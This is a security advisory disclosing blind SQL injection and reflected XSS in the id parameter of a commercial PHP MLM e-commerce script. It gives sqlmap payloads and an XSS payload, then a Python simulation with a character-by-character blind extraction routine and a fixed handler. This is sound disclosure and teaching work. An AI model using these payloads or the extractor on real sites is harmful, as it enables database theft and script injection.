ReadyMade Unilevel Ecommerce MLM Blind SQL Injection / Cross Site Scripting

2024.08.03
Credit: OoN_Boy
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79

[x]========================================================================================================================================[x]
| Title         : Readymade Unilevel Ecommerce MLM Blind SQL & XSS Vulnerabilities
| Software      : Readymade Unilevel Ecommerce
| Last Update   : 15/03/24 [TESTED VERSION SCRIPT]
| First Release : 16/11/21
| Vendor        : http://www.i-netsolution.com/
| Date          : 01 August 2024
| Author        : OoN_Boy
[x]========================================================================================================================================[x]
| Technology    : PHP
| Database      : MySQL
| Price         : $500
| Description   : MLM Unilevel Plan Script developed by experts and professionals. Rather than building your business from scratch, make use of our Unilevel MLM PHP Script to launch your MLM business.
[x]========================================================================================================================================[x]

[O] Exploit

http://localhost/eommlm/product-details.php?id=11 [SQL]
http://localhost/ecomlm/product-details.php?id=11 [XSS]

[O] Proof of concept

sqlmap.py -u "http://localhost/eommlm/product-details.php?id=11" --invalid-string

[SQL]
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=11 AND 1189=1189

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: id=11;SELECT SLEEP(10)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=11 AND (SELECT 6812 FROM (SELECT(SLEEP(10)))DddL)

[XSS]
http://localhost/ecomlm/product-details.php?id=11"><img/src/onerror=.1|alert`VrsHckGAY`+class=VrsHckGAY>

The sqlmap output shows the id parameter is not type-checked or bound before it reaches the query: a boolean condition appended to id changes whether the product page renders (boolean-based blind), a SLEEP() subquery delays the response (time-based blind), and a second statement after a semicolon is executed (stacked queries). The same unvalidated id is then echoed back into the HTML of the response without escaping, which is what the [XSS] payload abuses.

[x]========================================================================================================================================[x]
[O] Greetz
BatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc], xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^
[x]========================================================================================================================================[x]
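The following is an added example, not code from the advisory or from the vendor's script. It models the two findings on a constructed sqlite3 table standing in for the shop's MySQL products table: a hypothetical `product_details_vulnerable()` handler that concatenates `id` into the query and echoes it raw (the pattern that would explain the sqlmap output above), and a hardened `product_details_fixed()` that type-checks, binds the parameter and HTML-escapes the output. `blind_extract()` then runs the same boolean-based oracle sqlmap used (`id=11 AND <condition>`) against each handler to pull a string out of the database one character at a time. Table contents, product names and the XSS payload are constructed for the example; only the boolean technique is simulated because sqlite3's `execute()` refuses stacked statements and has no `SLEEP()`.

```python
"""Simulation of the boolean-based blind SQLi and reflected XSS pattern reported
for product-details.php?id=, using sqlite3 in place of MySQL.
Constructed example; the handlers below are NOT the vendor's code."""
import html
import sqlite3


def make_db():
    """Constructed catalogue standing in for the shop's products table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL)")
    conn.executemany(
        "INSERT INTO products VALUES (?, ?, ?)",
        [(11, "Starter Kit", 49.0), (12, "Pro Kit", 99.0)],
    )
    return conn


def product_details_vulnerable(conn, id_param):
    """Assumed vulnerable pattern: id concatenated into SQL and echoed raw into HTML."""
    try:
        row = conn.execute(
            "SELECT name, price FROM products WHERE id=" + id_param
        ).fetchone()
    except sqlite3.Error:  # broken SQL still renders the 'not found' page
        row = None
    if row is None:
        return "<h1>Product not found</h1><p>id=" + id_param + "</p>"
    return "<h1>%s</h1><p>price %.2f</p><p>id=%s</p>" % (row[0], row[1], id_param)


def product_details_fixed(conn, id_param):
    """Hardened form: integer check, bound parameter, HTML-escaped output."""
    if not id_param.isdigit():
        return "<h1>Bad request</h1>"
    row = conn.execute(
        "SELECT name, price FROM products WHERE id=?", (int(id_param),)
    ).fetchone()
    if row is None:
        return "<h1>Product not found</h1><p>id=%s</p>" % html.escape(id_param)
    return "<h1>%s</h1><p>price %.2f</p><p>id=%s</p>" % (
        html.escape(row[0]), row[1], html.escape(id_param))


def blind_extract(handler, conn, subquery, max_len=64):
    """Boolean-based blind extraction of the single string SUBQUERY yields.

    Sends payloads of the shape sqlmap reported (`id=11 AND <condition>`) and
    tells true from false by whether product 11's page comes back.
    Returns None when the handler gives no true/false differential.
    """
    def truth(condition):
        return "Starter Kit" in handler(conn, "11 AND (" + condition + ")")

    if truth("1=1") == truth("1=2"):
        return None  # no oracle: both branches render the same page
    length = next(
        (n for n in range(max_len + 1) if truth("length((%s))=%d" % (subquery, n))),
        None,
    )
    if length is None:
        return None
    out = ""
    for pos in range(1, length + 1):
        lo, hi = 32, 126  # binary search over printable ASCII: 7 requests per char
        while lo < hi:
            mid = (lo + hi) // 2
            if truth("unicode(substr((%s),%d,1))>%d" % (subquery, pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


# Constructed reflected-XSS payload in the same shape as the advisory's.
XSS_PAYLOAD = '11"><img src=x onerror=alert(1)>'


if __name__ == "__main__":
    db = make_db()
    leak = "SELECT name FROM products WHERE id=12"
    print("vulnerable:", blind_extract(product_details_vulnerable, db, leak))
    print("fixed     :", blind_extract(product_details_fixed, db, leak))
    print("xss vuln  :", product_details_vulnerable(db, XSS_PAYLOAD))
    print("xss fixed :", product_details_fixed(db, XSS_PAYLOAD))
```

Against the vulnerable handler the oracle recovers the second product's name without ever seeing query output, which is the whole point of a blind finding: a one-bit difference per request is enough. Against the fixed handler the non-numeric `id` is rejected before any SQL runs, so both probe branches return the same page and `blind_extract()` reports no oracle; the same check stops the reflected payload, and `html.escape()` covers the case where a value still has to be echoed.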


Copyright 2024, cxsecurity.com